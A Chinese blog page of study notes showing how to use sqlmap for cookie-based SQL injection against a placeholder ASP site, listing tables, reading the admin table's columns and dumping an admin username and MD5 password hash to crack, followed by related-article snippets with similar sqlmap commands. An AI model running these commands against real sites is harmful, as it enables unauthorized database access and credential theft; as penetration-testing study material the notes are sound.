3.羽翼sqlmap学习笔记之Cookie注入

最新推荐文章于 2024-08-20 13:24:05 发布
最新推荐文章于 2024-08-20 13:24:05 发布
阅读量97 收藏
点赞数
文章标签: 数据库

Cookie注入:

1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.
2.sqlmap命令提示符下输入下列内容进行跑表。

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2

   假设返回内容如下,说明是access数据库。

   -------------------------
   
   [INFO] resuming back-end DBMS 'microsoft access'

   ------------------------- 

   设置线程数:10 
   假设返回结果:

-------------------------------------------
[ 4 tables]

+----------------------+

       admin
       mark
       province
       vote

+----------------------+

   找到四个表分别为:admin mark province vote

3.猜表的字段名:

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --columns -T admin --level 2

     假设找到admin表的字段如下:                   
                            id username password  

---------------------------------

  [INFO] retrieved:       id
  [INFO] retrieved:       username
  [INFO] retrieved:       password

----------------------------------

4.猜测字段的内容:

    sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --dump -T admin -C "username,password" --level 2   

  获取结果:

  [INFO] retrieved:       1
  [INFO] retrieved:       admin
  [INFO] retrieved:       21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)


  账号:admin 密码:将密文解密即可。

weixin_33806509
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于ctfhub中cookie注入方法之sqlmap自动注入
m0_62819604的博客
10-23 688
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库为sqli 然后查询数据库sqlmap -u "http://challenge-593b57751..
sqlmap.py 脚本 sqlmap-master.zip
10-16
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookieCOOKIE”//修改请求时的cookie ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库 ./...
sqlmap之(五)----Cookie注入实战
你身后的人
04-21 1185
(1) cookie注入,猜解表  [html] view plain copy sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2    do you want to URL encode cookie values (implementation specific)? [Y/n...
Sqlmap2021 -- Cookie注入
weixin_41489908的博客
07-07 4074
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
sql注入sqlmap(渡栗的学习笔记
2301_79998006的博客
06-17 1107
sqlmap的使用。Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库
sqlmap学习笔记——sql注入post注入
zhh763984017的博客
11-16 1万+
sqlmap学习笔记——sql注入post注入 工作环境:kali-Linux、win10 靶机:墨子学院提供的用于post漏洞SQL注入的靶机 使用到的软件:wireshark、sqlmap 先随便提交一个表单,然后在windows下用wireshark捕捉了post请求的内容,post请求内容如下: POST /login.php HTTP/1.1 Host: 219.153.49.228:4...
SQLmap学习笔记
B_l_a_nk的博客
04-07 956
sqlmap的一些简单使用和一些基本命令
sqlmap之POST注入cookie注入
热门推荐
ve9etable的博客
10-28 2万+
零、POST注入 POST和GET POST和GET是HTTP的两种请求方法,并且是两种最常用的请求方法 GET一般指向指定资源请求数据,而POST则是要向指定资源提交需要被处理的数据 查询字符串是在 GET 请求的 URL 中发送的,类似于这样 而POST查询字符串是在 请求的 HTTP 消息主体中发送的,类似于这样 ...
sqlmap获取mysql数据库,SQLMAP学习笔记2 Mysql数据库注入
weixin_42350506的博客
03-27 452
SQLMAP学习笔记2 Mysql数据库注入注入流程(如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息)sqlmap-u"URL"--cookie="名称=值;名称=值"--batch #其中-u参数指定目标URL,--batch参数采用默认选项、不进行询问。结果发现是可注入的1、sqlmap -u "url" --dbs # 获取数据库;2、sq...
sqlmap 随笔 羽翼sqlmap学习笔记
freshfox的博客
08-07 353
sqlmap mysql 命令 http://www.jb51.net/softjc/63593.html cookie 参数: --cookie="aa=1;bb=2" 写文件 注意:当sqlmap结束运行后,所产生的文件会自动删除 参数:-gsqlmap可以测试注入Google的搜索结果中的GET参数(只获取前100个结果)。例子:python sqlmap.py -...
SQLMAP渗透笔记Cookie中转注入
Birdman-one的博客
12-26 2612
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记Cookie中转注入                                       ---------------
SQLMAP使用笔记.pdf
01-25
3. `--cookie`:cookie 注入 4. `--referer`:使用 referer 欺骗 5. `--user-agent`:自定义 user-agent 6. `--proxy`:代理注入 7. `--string`:指定关键词 8. `--threads`:采用多线程 9. `--sql-shell`:执行指定...
java开发基于SQLmap的SQL注入工具源码.zip
06-01
基于SQLmap的SQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmap的SQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx)...
sqlmap中文手册-sql注入自动化测试工具
07-19
在实际使用中,如果发现Web页面的参数(如GET、POST或Cookie)可能受到SQL注入的影响,SQLMap可以快速进行验证。例如,通过对URL中的参数进行测试,如`id=1 AND 1=1`和`id=1 AND 1=2`,如果两个请求返回不同的结果,...
sqlmap笔记.md
08-18
sqlmap笔记
【达梦数据库】-导入导出过程中get DDL复现过程
weixin_47686079的博客
08-20 164
在处理问题的过程中,客户反馈在达梦数据库中导入导出分区表,get 表的DDL,不会出现表的所有分区信息,ORACLE数据库却会出现所有分区表,事实真的如此吗?
linux安装达梦数据库
HAN_789的博客
08-19 121
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
分布式事务:基本概念
最新发布
玉汝于成
08-20 182
事务可以看做事一次大的活动,它由不同的小的活动组成,这些活动要么全部成功,要么全部失败。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 474
【代码】springboot网上商品订单转手系统bootpf
Kuka.forcetorquecontrol 4.1教程:SQLmap注入与Webshell获取
文件读写功能也是SQLmap的强大之处,如`--file-read`用于从数据库管理系统中读取文件,而`--file-write`则可用于修改或上传文件。`--file-dest`用于指定文件写入的绝对路径,这些操作在某些情况下可用于攻击者的植入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值